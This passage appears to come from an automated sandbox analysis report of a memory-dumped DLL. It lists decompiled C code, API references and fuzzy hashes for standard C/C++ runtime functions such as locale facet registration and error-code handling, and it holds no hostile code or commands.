													asm("int3");
													E6E1E00AC(0x6e2283cf, _t141, _t186, _t191, 0x14);
													E6E1C6653(_t198 - 0x14, 0);
													_t192 =  *0x6e286e44; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1A161C(0x6e286e24);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E1C66BA(_t198 - 0x14);
														return E6E1E0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E1DC295(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1A1438(_t169);
																E6E1E3D74(_t198 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e22851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e22c414;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E1DD028(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E1E0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E1C6FD3(__eflags, _t187);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e286e44 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E1C6FD3(__eflags, _t186);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e286e40 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E1C6FD3(__eflags, _t185);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e286e38 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E1C6FD3(__eflags, _t184);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e286e3c = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

0x6e1db9e4
0x6e1db9e4
0x6e1db9eb
0x6e1db9f5
0x6e1db9fa
0x6e1dba05
0x6e1dba09
0x6e1dba0c
0x6e1dba11
0x6e1dba15
0x6e1dba1a
0x6e1dba1e
0x6e1dba63
0x6e1dba66
0x6e1dba72
0x6e1dba20
0x6e1dba22
0x6e1dba28
0x6e1dba2e
0x6e1dba36
0x6e1dba39
0x6e1dba76
0x6e1dba84
0x6e1dba89
0x6e1dba91
0x6e1dba9b
0x6e1dbaa0
0x6e1dbaab
0x6e1dbaaf
0x6e1dbab2
0x6e1dbab7
0x6e1dbac0
0x6e1dbac2
0x6e1dbac4
0x6e1dbb09
0x6e1dbb0c
0x6e1dbb18
0x6e1dbac6
0x6e1dbac6
0x6e1dbac8
0x6e1dbace
0x6e1dbad4
0x6e1dbadc
0x6e1dbadf
0x6e1dbb1c
0x6e1dbb2a
0x6e1dbb2f
0x6e1dbb37
0x6e1dbb41
0x6e1dbb46
0x6e1dbb51
0x6e1dbb55
0x6e1dbb58
0x6e1dbb5d
0x6e1dbb66
0x6e1dbb68
0x6e1dbb6a
0x6e1dbbaf
0x6e1dbbb2
0x6e1dbbbe
0x6e1dbb6c
0x6e1dbb6c
0x6e1dbb6e
0x6e1dbb74
0x6e1dbb7a
0x6e1dbb82
0x6e1dbb85
0x6e1dbbc2
0x6e1dbbd0
0x6e1dbbd5
0x6e1dbbdd
0x6e1dbbe7
0x6e1dbbec
0x6e1dbbf7
0x6e1dbbfb
0x6e1dbbfe
0x6e1dbc03
0x6e1dbc0c
0x6e1dbc0e
0x6e1dbc10
0x6e1dbc55
0x6e1dbc58
0x6e1dbc64
0x6e1dbc12
0x6e1dbc12
0x6e1dbc14
0x6e1dbc1a
0x6e1dbc20
0x6e1dbc28
0x6e1dbc2b
0x6e1dbc65
0x6e1dbc68
0x6e1dbc76
0x6e1dbc7b
0x6e1dbc83
0x6e1dbc88
0x6e1dbc8a
0x6e1dbc90
0x6e1dbc93
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbca0
0x6e1dbca6
0x6e1dbca9
0x6e1dbcb5
0x6e1dbc2d
0x6e1dbc2d
0x6e1dbc30
0x6e1dbc34
0x6e1dbc38
0x6e1dbc45
0x6e1dbc4d
0x6e1dbc4f
0x00000000
0x6e1dbc4f
0x6e1dbc16
0x6e1dbc16
0x00000000
0x6e1dbc16
0x6e1dbc14
0x6e1dbb87
0x6e1dbb87
0x6e1dbb8a
0x6e1dbb8e
0x6e1dbb92
0x6e1dbb9f
0x6e1dbba7
0x6e1dbba9
0x00000000
0x6e1dbba9
0x6e1dbb70
0x6e1dbb70
0x00000000
0x6e1dbb70
0x6e1dbb6e
0x6e1dbae1
0x6e1dbae1
0x6e1dbae4
0x6e1dbae8
0x6e1dbaec
0x6e1dbaf9
0x6e1dbb01
0x6e1dbb03
0x00000000
0x6e1dbb03
0x6e1dbaca
0x6e1dbaca
0x00000000
0x6e1dbaca
0x6e1dbac8
0x6e1dba3b
0x6e1dba3b
0x6e1dba3e
0x6e1dba42
0x6e1dba46
0x6e1dba53
0x6e1dba5b
0x6e1dba5d
0x00000000
0x6e1dba5d
0x6e1dba24
0x6e1dba24
0x00000000
0x6e1dba24
0x6e1dba22

APIs

__EH_prolog3.LIBCMT ref: 6E1DB9EB
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB9F5
int.LIBCPMT ref: 6E1DBA0C

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1DBA2F
std::_Facet_Register.LIBCPMT ref: 6E1DBA46
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBA66
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBA84

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 5709c3a301dc118c4cbb8ba1b28144a7cf516029de0aae17c5bf51a69324997c
Instruction ID: f6341a073776d5cda293499c847775b3163cf861162d397071e0a35119c0ee1c
Opcode Fuzzy Hash: 5709c3a301dc118c4cbb8ba1b28144a7cf516029de0aae17c5bf51a69324997c
Instruction Fuzzy Hash: 24115CB591052DCBCF01DBD4C884FFEB37AAF55704F140908E411AB290CF749A89E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D683, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E20D683(void* __ecx, void* __edx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x6e2851e4; // 0x8
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E6E20C7EF(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E6E214196(_t13, __eflags,  *0x6e2851e4, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E20D33F(_t13, _t16, "0d�");
							E6E20CBD3(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E6E20CBD3();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E6E214140(_t11, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x6e20d683
0x6e20d68e
0x6e20d690
0x6e20d692
0x6e20d697
0x6e20d69a
0x6e20d6a8
0x6e20d6b4
0x6e20d6b7
0x6e20d6ba
0x6e20d6cc
0x6e20d6d1
0x6e20d6d3
0x6e20d6de
0x6e20d6e4
0x6e20d6ec
0x6e20d6ee
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20d6d5
0x6e20d6d5
0x00000000
0x6e20d6d5
0x6e20d6bc
0x6e20d6bc
0x6e20d6bd
0x6e20d6bd
0x6e20d6f0
0x6e20d6f1
0x6e20d6f1
0x6e20d69c
0x6e20d6a2
0x6e20d6a6
0x6e20d6f9
0x6e20d6fa
0x6e20d700
0x00000000
0x00000000
0x00000000
0x6e20d6a6
0x6e20d707

APIs

GetLastError.KERNEL32(6E1C75D9,6E1C75D9,00000002,6E202286,6E20F2B0,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004), ref: 6E20D688
_free.LIBCMT ref: 6E20D6BD
_free.LIBCMT ref: 6E20D6E4
SetLastError.KERNEL32(00000000,?,6E1C75D9), ref: 6E20D6F1
SetLastError.KERNEL32(00000000,?,6E1C75D9), ref: 6E20D6FA

Strings

0d, xrefs: 6E20D6D8

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free
String ID: 0d
API String ID: 3170660625-2809447700
Opcode ID: 40c876d991315d3cc4872231a9da53f21f1dfa22f0fc7957a6b7c21131d23903
Instruction ID: 3fd612a2b0acf8b2f7574502f79f09eb6c195464633906ed7cd4893399175c3f
Opcode Fuzzy Hash: 40c876d991315d3cc4872231a9da53f21f1dfa22f0fc7957a6b7c21131d23903
Instruction Fuzzy Hash: 7601F9BA18690A2FC30216E56C8DE8B277F9BC377A7240815F419971D1EFB088018974

Uniqueness

Uniqueness Score: -1.00%

Function 6E21621F, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E1FF290,6E1FF290,?,?,?,6E216470,00000001,00000001,C5E85006), ref: 6E216279
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E216470,00000001,00000001,C5E85006,?,?,?), ref: 6E2162FF
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E2163F9
__freea.LIBCMT ref: 6E216406

Part of subcall function 6E20F26D: RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

__freea.LIBCMT ref: 6E21640F
__freea.LIBCMT ref: 6E216434

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 32253ed4e820536012d7d39dfdef7b9965ce949dae70777f272407028953416a
Instruction ID: d17b67a0d4ae72e168519885af884913bf8c2d2ec0f161e1dbf85bf6c3583f73
Opcode Fuzzy Hash: 32253ed4e820536012d7d39dfdef7b9965ce949dae70777f272407028953416a
Instruction Fuzzy Hash: 9A51B07262421BAFEB258EE4CC80EEF37EBEB44754F154629EE14D6140EB34DD918690

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E42C8, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E1E3EDB,6E1DFA25,6E1DFD54,?,6E1DFF71,?,00000001,?,?,00000001,?,6E2827E0,0000000C,6E1E006E), ref: 6E1E42D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E1E42E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E1E42FD
SetLastError.KERNEL32(00000000,6E1DFF71,?,00000001,?,?,00000001,?,6E2827E0,0000000C,6E1E006E,?,00000001,?), ref: 6E1E434F

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9691239de170a899e31a3bc37241588125ad9f2c2691b6410be3da5d0a13ab33
Instruction ID: d19f6520302ee1a8ae0207dc4aec2bba82585987b76f4bca51f2f1a016bf2b13
Opcode Fuzzy Hash: 9691239de170a899e31a3bc37241588125ad9f2c2691b6410be3da5d0a13ab33
Instruction Fuzzy Hash: FC01473221DF325FEB1406F56C99A8B26AAEB2737A330032AF02445CD4EF514886F190

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4747, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1C474E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C4758
int.LIBCPMT ref: 6E1C476F

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1C47A9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C47BF
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C47DD

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a663725558be09726d25145bc23f82147ebea613ccf9e71b6a8feed4fbb5b3c3
Instruction ID: c517de240fc0369a7a041250e9d3e7debac3dec11e6408834f476cdadaedf7c6
Opcode Fuzzy Hash: a663725558be09726d25145bc23f82147ebea613ccf9e71b6a8feed4fbb5b3c3
Instruction Fuzzy Hash: 311159759006288FCB01DBE4C804AFEB779BF25B04F20490CE521EB290DB788985E7D2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF7FF, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CF806
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF810
int.LIBCPMT ref: 6E1CF827

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF861
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF881
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF89F

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: b21e8cbcbc28e225b7c82c9953daa4e3c39eec8def2fbb1f07a6ee485bd07a4a
Instruction ID: 9d1e5caef6308bc1c09561e3f8c731b572e26b420acda9250dbae664451146fc
Opcode Fuzzy Hash: b21e8cbcbc28e225b7c82c9953daa4e3c39eec8def2fbb1f07a6ee485bd07a4a
Instruction Fuzzy Hash: DE110A759105298BCF01EBE4C854AFDB77AAF65B14F240809E520EB290DF7899C4E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF41B, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CF422
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF42C
int.LIBCPMT ref: 6E1CF443

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF47D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF49D
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF4BB

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 021d7149478ac493dbd06481df323198aa86dfdbc41c2c82b7531e12bc7e7b04
Instruction ID: d6025894efc5a81f61734d93bc2f5a242bd8ad8e34df5f4dbca0ff39fa512ffd
Opcode Fuzzy Hash: 021d7149478ac493dbd06481df323198aa86dfdbc41c2c82b7531e12bc7e7b04
Instruction Fuzzy Hash: BB113A759105198BCF05EBD4CC64AFDB37ABF64B14F240408D120E7290CF789989E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA24B, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CA252
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA25C
int.LIBCPMT ref: 6E1CA273

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CA2AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA2CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA2EB

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a0b1fcbb406056e7ad3890f12b73dadeb6a155ce36eeea08039bf1fb697cebc6
Instruction ID: 453eca37adad54a19650af7e00fc2c4972c76643a17334e609ef5088bf3b8699
Opcode Fuzzy Hash: a0b1fcbb406056e7ad3890f12b73dadeb6a155ce36eeea08039bf1fb697cebc6
Instruction Fuzzy Hash: B911597591052D8BCF02EBE4C854AFEB37ABF64B14F140808E111E7290DF789984E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFA97, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CFA9E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFAA8
int.LIBCPMT ref: 6E1CFABF

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFB19
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFB37

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: f57e4d897ae1638ab469b211fea7aeb0287e309dc4981500d40f097f594e4afa
Instruction ID: 91829220ffc1e08e35ba5f285afb285ddd2dc996c839ed5b6442c114aaa958a2
Opcode Fuzzy Hash: f57e4d897ae1638ab469b211fea7aeb0287e309dc4981500d40f097f594e4afa
Instruction Fuzzy Hash: 8711597591051D8FCF01DBE4C864AFEB37ABF64B04F244809E520EB290DF789985EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF2CF, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CF2D6
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF2E0
int.LIBCPMT ref: 6E1CF2F7

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF331
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF351
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF36F

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 1ce6041ca22d53b7ecaf6ddb73c3dde8de6099e7de59e688c75d00219f99468a
Instruction ID: 5b55dc90c2d450d8151c4fa4988c1c7b7c7d6c6ee190d8d095b3d50f87f5c9df
Opcode Fuzzy Hash: 1ce6041ca22d53b7ecaf6ddb73c3dde8de6099e7de59e688c75d00219f99468a
Instruction Fuzzy Hash: 0A113A759105189BCF01DBD4C854AFEB77AAF64B04F244809D430EB2D0DF789985E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFB3D, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CFB44
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFB4E
int.LIBCPMT ref: 6E1CFB65

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFB9F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFBBF
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFBDD

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: c42095c8bf43814da43447dd730662a2943bb1d3fa6f32aae9a7b3cbac2c7cf8
Instruction ID: e0153f20601bed145871338c3edc332bbf7e82680145aaf3d61d0579a3cefd28
Opcode Fuzzy Hash: c42095c8bf43814da43447dd730662a2943bb1d3fa6f32aae9a7b3cbac2c7cf8
Instruction Fuzzy Hash: 52113AB591051D8BCF01DBD4C864BFEB77ABF64B14F240809D520E7290DF789989E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFBE3, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CFBEA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFBF4
int.LIBCPMT ref: 6E1CFC0B

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFC45
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFC65
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFC83

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 3a4ea944c3ad0dc6150481406e5a045e28f178525b5987d98dc1780c589b0e51
